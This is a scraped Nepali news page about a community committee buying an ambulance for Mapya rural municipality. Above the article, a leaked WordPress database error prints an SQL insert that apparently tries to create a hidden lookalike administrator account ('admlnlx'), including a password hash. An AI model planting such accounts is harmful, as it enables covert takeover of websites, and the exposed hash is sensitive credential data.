WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHCqkSb23Sj2b2kXYEfoj/AeSSVmYE.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:45:26', '', 'admlnlx', 'admlnlx')
काकु समावेशी विकास समितीको पहलमा माप्य गाँउपालिमा सेवा दिने उद्देश्यले नँया एम्वुलेन्स खरिद गरेका छन । गामिण स्वस्थलाई मध्य नजर गर्दै वि.स. ०७५ सालवाट सहयोग संकलन शुरु गरेर महिन्दा कम्पनीको नँया वलेरो खरिद गर्न सफल भएका हो ।
अहिले विभिन्न क्षेत्रमा सडक सन्जाल जोडिए सँगै गाँउ घरका विपन्न विरामीहरुको लागि सहज हुने भएको छ । यस अघि माप्य गाँउपालिकाका समुदायहरु केहि जटिल किसिमका विरामी भए हेलीमा मँहगो चार्टर गर्नुपर्ने वाध्यता रहेको थियो । एम्वुलेन्स खरिद गर्दा भन्सार करमा पनि छुट हुने भएकोले एम्वुलेन्स खरिद गर्न सजिलो भएको काकु समावेशी विकास समितीका अध्यक्ष चन्द वहादुर राईले जानकारी दिनुभयो । काकु समावेशी विकास समितीको अथक पयासमा सो एम्वुलेन्स खरिद गरेता पनि समग माप्य गाँउपालिका लगायत अन्य नजिकमा जोडिएर रहेका गाँउपालिका लागि एउटा कोशेढुगा सावित भएको संस्थाका महासचिव तिलक राईले वताउनु भयो । देशविदेशमा रहेका सहयोगी मनहरुको पयासले सो एम्वुलेन्स किन्न सफल भएको हो ।